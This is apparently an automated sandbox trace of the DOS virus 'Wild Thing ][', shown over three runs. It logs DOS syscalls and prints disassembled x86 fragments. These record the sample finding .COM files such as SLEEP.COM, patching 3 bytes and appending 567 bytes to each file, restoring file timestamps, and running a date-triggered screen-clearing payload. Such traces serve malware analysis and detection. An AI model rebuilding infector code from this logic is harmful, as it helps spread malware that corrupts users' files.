2018-12-25T12:42:11.31888658Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:11.321582865Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:11.323995371Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:11.332672999Z 62 PC: 131ba | Close file
2018-12-25T12:42:11.335039658Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:11.336300509Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:11.338988008Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:11.340821287Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:11.342275103Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:11.344718128Z 73 PC: 119df | Release memory
2018-12-25T12:42:11.34613332Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:11.34798038Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:07.444154354Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:07.44682697Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:07.448935127Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:07.451673933Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:07.454170617Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:07.460113655Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:07.470616079Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:07.481315874Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:07.498524284Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:07.505452705Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:07.507141466Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:07.514054759Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:07.515738329Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:07.518669284Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.526653613Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:07.535654863Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:07.537403425Z 62 PC: 12bfc | Close file
2018-12-25T12:42:07.545512564Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:07.557580223Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.560298954Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.56648238Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.576165065Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.582629272Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.584916436Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.591538663Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.59317482Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.610464957Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.61690118Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.633152093Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.635701803Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.647205374Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.657054149Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.660350075Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.666320497Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.676288202Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.689181413Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.691354401Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.698448432Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.70013401Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.703568119Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.705567185Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.714035011Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.716152864Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.723729427Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.737209906Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.743848045Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.750249605Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.765627622Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.772910005Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.775084903Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.782645355Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.784734367Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.788332Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.790298184Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.799995291Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.802137084Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.809926729Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.820648481Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.823851791Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.83032143Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.840945602Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.8480599Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.849710989Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.856405079Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.859264878Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.862138125Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.864089326Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.873380563Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.875111793Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.883300966Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.894385002Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.897067792Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.90666742Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.917686435Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.924518347Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.926240724Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.93351418Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.935274792Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.937860877Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.940277502Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.949137937Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.950595474Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.960046441Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.970979427Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.974009396Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.980801515Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.99054186Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.997312399Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.999743816Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.006302904Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.007960659Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.01164452Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.014014677Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.022852787Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.025583905Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.034229394Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.04411483Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.046997015Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.053535789Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.063998104Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.071671389Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.074002696Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.083644704Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.085199732Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.09543504Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.105257878Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.107575428Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:08.11209801Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:08.114407148Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:08.115753107Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:08.124749456Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:07.541930469Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:07.54338097Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:07.545781497Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:07.549008265Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:07.551419795Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:07.559001939Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:07.571392665Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:07.580210497Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:08.208795887Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:08.216587287Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:08.218600245Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:08.228683057Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:08.230651774Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:08.233670373Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.236089273Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:08.245808096Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:08.247869415Z 62 PC: 12bfc | Close file
2018-12-25T12:42:08.258264905Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:08.269216454Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.272281905Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.278809924Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.292102235Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.299933308Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.301900639Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.310747704Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.313019153Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.316398622Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.319542005Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.329805972Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.331736687Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.341482495Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.351045033Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.353689304Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.358560228Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.36788325Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.37533598Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.377344125Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.385325559Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.387260175Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.390550387Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.393422281Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.402543994Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.404620699Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.414471815Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.425641694Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.42913078Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.43692921Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.448563764Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.459788891Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.461982344Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.469672768Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.47161401Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.475223893Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.478268764Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.487819422Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.489910118Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.499539967Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.510728795Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.514061006Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.521640172Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.533640261Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.541342726Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.544012139Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.551680193Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.55353657Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.556974966Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.559994546Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.569318652Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.571331869Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.580782558Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.592176961Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.595260286Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.602382009Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.613451657Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.621326654Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.624007727Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.631432013Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.633347023Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.637497441Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.640002656Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.650111256Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.652364477Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.662472134Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.673654652Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.6769522Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.684264854Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.695360508Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.703170677Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.705699409Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.713162561Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.715023814Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.718830915Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.720820792Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.730551825Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.733128988Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.741958442Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.753247983Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.757064849Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.763781732Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.775602101Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.7898351Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.791645573Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.798767724Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.800760618Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.805612345Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.812312864Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.814962863Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:08.818360546Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:08.819837635Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:08.821005071Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:08.826701428Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:07.921795835Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:07.92363232Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:07.926725561Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:07.930285391Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:07.933106444Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:07.940879526Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:07.947554113Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:07.953907075Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:08.226660404Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:08.235337827Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:08.237961506Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:08.248424869Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:08.250162663Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:08.253412483Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.263236192Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:08.273363933Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:08.275645065Z 62 PC: 12bfc | Close file
2018-12-25T12:42:08.287254876Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:08.299693819Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.305528201Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.312589917Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.326261714Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.34876545Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.35098809Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.371594672Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.373310202Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.37657089Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.380202178Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.407895843Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.410189009Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.420833531Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.432407909Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.436017171Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.443352781Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.45592773Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.463434131Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.465491699Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.473816516Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.475743099Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.479728027Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.483476581Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.4939647Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.496158137Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.506141824Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.52944009Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.532806105Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.541492692Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.552414382Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.560060728Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.562859079Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.571562136Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.573669456Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.57723602Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.580444324Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.590718852Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.593010711Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.602966562Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.614453082Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.617480793Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.625183532Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.636543846Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.649202018Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.652608995Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.660551109Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.662414735Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.665871848Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.669252741Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.678681203Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.680862281Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.688160516Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.697046422Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.700132718Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.70667921Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.714340929Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.719774138Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.721537774Z 63 PC: 12bad | Read file or device (See above)
